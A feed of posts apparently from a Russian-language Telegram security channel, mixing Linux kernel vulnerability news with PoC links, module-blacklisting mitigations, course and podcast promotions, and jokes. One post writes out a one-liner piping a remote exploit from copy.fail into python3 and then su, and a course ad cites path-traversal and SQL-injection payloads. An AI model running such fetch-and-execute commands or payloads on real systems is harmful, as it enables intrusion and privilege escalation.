Ever Secure
4.43K subscribers
825 photos
65 videos
27 files
476 links
Авторский канал про безопасность и не только
Youtube - https://www.youtube.com/@EverSecure
Boosty - boosty.to/ever_secure
Чат - @ever_secure_chat
Вакансии - @ever_secure_jobs
Несмешные мемы - @fsecurity_channel

По всем вопросам: @aleksey0xffd
Download Telegram
Вчера в гостях у канала был Андрей Усенок, сняли для вас потрясающий материал 😉
👍10👏32
астрологи объявили неделю обновлений CVE-2026-31431

curl https://copy.fail/exp | python3 && su


👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
7😨5💯2🤣2
в контейнере тоже можно поднять права, если есть петухон (КОНКРЕТНО ДЛЯ ЭТОГО ЭКСПЛОИТА, НАПИСАННОГО НА Python), а дальше уже вы все и так знаете...

но если нет, прикладываю видос с побегами https://youtu.be/biC3TO7OELY

👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6
патч:

rm -rf /lib/modules/*/kernel/crypto/algif_aead.*

или

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true


👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
4
Кто-нибудь, скажите уже ребятам из Ozon, что при нажатии в письме отписаться от рассылки, нужно ансанскрайбить, а не вести в личный кабинет, которого у меня давно нет, но к нему привязана почта, а меня перекидывает в новый кабинет где почты никакой и нет. Номера старого у меня тоже нет.

Предыдущий пост тут
https://t.me/ever_secure/1071
Но там был Ozon Travel, теперь Ozon Fintech. я не понимаю как я подписался на все появляющиеся новые продукты, но очень хочу отписаться(

Кажется UX дизайнеру пока на покойотдых)
👾9👍7👏32
Forwarded from IT STAND
Live: Kubernetes v1.36: Haru

Рассмотрим нововведение:
- Функция NodeLogQuery контроля доступа включена по умолчанию
- Плагин gitRepovolumes удален навсегда
- Service.spec.externalIPs устарело. Это поле является известным вектором атаки типа MITM (Man-in-the-Middle) со времен CVE-2020-8554.
И многое другое
Обсудим примеры применения, что еще сырое, а что must have и срочно надо внедрять)

❤️ Главный по безопасным кубикам - Алексей Федулаев @int0x80h
❤️ Админ Девелоперович - Георг Гаал @gecube

Традиционно обозревают новую версию Kubernetes 1.36
🕖 уже в четверг в 20:00

Прямая трансляция: youtube.com/watch?v=l55Svj_WwH0
с ответами на вопросы из чата YouTube

При поддержке:
@kuber_community @ever_secure @devopsforlove @kubernetes_ru

🔥IT STAND | FIDELINA | YouTube
31🔥1
Cloudflare пометила сайт <месенджера с парковки> вредоносным

https://radar.cloudflare.com/scan/3c745d75-2df5-4480-947f-278da1221657/summary


В пресс-службе Max заявили, что мессенджер "регулярно проходит аудиты безопасности, работает с исследователями через программу Bug Bounty и имеет собственный центр безопасности для защиты пользователей от реальных угроз".


Видимо товарищ майор в список оплачиваемых уязвимостей не входил 🌚
😁134👏3🔥1
Уже скрипты какие-то рекламируют на улице, аккуратнее...
😁3310
Ever Secure
Хочу немного рассказать о преподавательском составе курса! Для такого легендарного курса, я позвал не менее легендарных преподавателей. Вот первый из них: Александр Кондратьев (Автор канала Админим с Буквой @bykvaadm, Head of DevOps BI.ZONE). Саша DevOps…
Продолжая про наш будущий курс 👀
DevSecOps — это не «человек со сканером»

Когда я как руководитель собеседую DevSecOps, мне неинтересно, умеет ли человек воткнуть Trivy в пайплайн (у меня это спокойно делали стажеры). Мне важно: понимает ли он, что именно сканер ищет, сможет ли проэксплуатировать находку руками, объяснит ли разработчику, почему так сломалось и как правильно чинить.

Такому же подходу я придерживаюсь и в обучении!

Под это я и собрал лабы - 23 категории уязвимостей, 50+ флагов на эксплуатацию. И главное - не на уровне
../../../etc/passwd и 1' OR 1=1 --.

хотя и их пройдем в самом начале 😉

Возьмём тот же Path Traversal. В лабе ты не просто читаешь ../../../etc/passwd. Ты учишься обходить фильтры:
• вырезания ../
• одинарное и двойное URL-кодирование
• кодирование только слеша / только точек
• absolute path bypass
• флаги раскиданы по разным файлам из реальных кейсов (будь то захардкоженные секреты в коде, креды в Dockerfile, интересных местах на системе и т.д). Таким образом, ты получаешь насмотренность

И так абсолютно по каждой теме: упор на вариативность векторов, обходы санитайзеров, реальные ошибки разработчиков, а не одна каноничная пейлоада из чек-листа. И это только 1 модуль из 11 💪

Моя цель: чтобы после курса человек смотрел на код и видел уязвимость до того, как сканер что-то скажет, прекрасно понимал, какие уязвимости он найдет с помощью SAST и DAST, а что не увидит и вовсе. Это и есть DevSecOps специалист, за которого я готов платить.

Старт: 06.06.26
Стоимость: 99к для первого потока
1🔥23🥴7🥱5🙈5👍4
Ever Secure
астрологи объявили неделю обновлений CVE-2026-31431 curl https://copy.fail/exp | python3 && su 👀@ever_secure | 💪 Мерч | 💳Поддержать
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431)

https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes

👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
👍18
Ever Secure
Ждете новый выпуск CISO Podcast?💪
Media is too big
VIEW IN TELEGRAM
Новый выпуск CISO Podcast 🚀🚀🚀

Гость нашего выпуска: Валерий Сащенко (CISO ГНИВЦ, ex CISO Yota) с 20-летним опытом делится своим путём в ИБ: подводные камни, ошибки, препятствия. Обсудили на подкасте, как строить карьеру в информационной безопасности, с какими рисками вы столкнётесь и какие криминальные истории остаются за кадром индустрии.

Премьера 10 мая!
📹 Youtube

Предыдущий выпуск: https://t.me/ever_secure/1074

👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥157🥰3🤣1
20 мая буду рассказывать, как мы строили процессы безопасности в нашем прекрасном облаке 🌨

Вы узнаете, как пройти весь путь от ручного сканирования кластеров до полной автоматизации. И не в теории🤓, а на практике🛠:
Какие есть подводные камни при переходе с ручных сканов на Admission
Как покрыть тепловыми картами кластеры и отслеживать нарушения
Как находить аномалии в поведении пользователей
И наконец, как это всё подружить с SOC

Вебинар будет полезен CISO, CTO, CIO, ИБ-специалистам и DevOps-инженерам, работающим в облачных средах. Регистрируйтесь, подключайтесь к прямому эфиру и расскажите в чате как вы сделали лучше задавайте вопросы 😉

📆 20 мая в 12:00
Зарегистрироваться
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍7❤‍🔥3🤗1
Ever Secure
Астрологи объявили продолжение недели обновлений, подъехал PoC побега из контейнера для Copy Fail (CVE-2026-31431) https://www.stream.security/post/cve-2026-31431-how-copy-fail-behaves-in-kubernetes 👀@ever_secure | 💪 Мерч | 💳Поддержать
зря мы издевались над астрологами, старая неделя обновлений еще не успела закончится, как подъехала новая неделя обновлений)
Linux LPE

https://github.com/V4bel/dirtyfrag

👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
19
Друзья, с днем победы!
1🫡2412👍6
Мои друзья в этой году в четвертый раз проводят конференцию БеКон 2026: единственную в России конференцию по безопасности контейнеров и Kubernetes

Топовые специалисты рассказывают о безопасности Kubernetes без маркетинговой шелухи: только практики, кейсы и инструменты.

В этом году целых два трека:
🧪 «Ингредиенты» — технологии: hardening кластеров, runtime-защита, policy-as-code, сканирование образов
👥 «Рецепты» — люди и процессы: как выстроить культуру безопасности, коммуникацию Dev/Sec/Ops, внедрить Zero Trust в микросервисы

🗓 2 июня 2026 | 📍 Москва, Лофт ГОЭЛРО
👉 Регистрация и программа
1🔥532
Ever Secure
зря мы издевались над астрологами, старая неделя обновлений еще не успела закончится, как подъехала новая неделя обновлений) Linux LPE https://github.com/V4bel/dirtyfrag 👀@ever_secure | 💪 Мерч | 💳Поддержать
Соскучились по обновлениям?
Встречайте Fragnesia Linux LPE 🎉
https://github.com/v12-security/pocs/tree/main/fragnesia

Новая уязвимость использует поверхность атаки, как и DirtyFrag (SP/XFRM), но является отдельной багой.
Митигация осталась прежней:

rmmod esp4 esp6 rxrpc
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf

мы публиковали ансиболь плейбук туть: https://t.me/ever_secure/1197

Кто лечился обновлением ядра, оно не спасает от новой баги, бегите патчить 🥲

👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3
Сюрприз для выезжающих за границу, если вы надеялись пожить в свободном мире, то вас ждёт сюрприз:
В роуминге трафик проксируется все равно через Россию, так что пожить без впна не получится 😂
Протестировано на МегаФоне и МТС

ЗЫ даже уехать из России уже не помогает 🤣🤣🤣
ЗЫЫ бонус удаленщикам на Бали
😁23
Ever Secure
Соскучились по обновлениям? Встречайте Fragnesia Linux LPE 🎉 https://github.com/v12-security/pocs/tree/main/fragnesia Новая уязвимость использует поверхность атаки, как и DirtyFrag (SP/XFRM), но является отдельной багой. Митигация осталась прежней: rmmod…
This media is not supported in your browser
VIEW IN TELEGRAM
Успели обновиться вчера? 🌚
Еще не успели выдохнуть, как подъехала 4 уязвимость

Arbitrary File Read Linux
https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/tree/main

Патча пока нет 🌚

* Block pidfd_getfd. I don't think it's actually used that heavily and
there's often fallbacks for older kernels when it is.

* You could remove the world-executable bit from ssh-keysign
but this is *not* the only binary affected, and this is a very weak
mitigation indeed __only for the PoC__.


👀@ever_secure | 💪 Мерч | 💳Поддержать
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚143
This media is not supported in your browser
VIEW IN TELEGRAM
Qemu escape

https://github.com/v12-security/pocs/tree/main/qemu

Берегите свои облачки
🥰121🦄1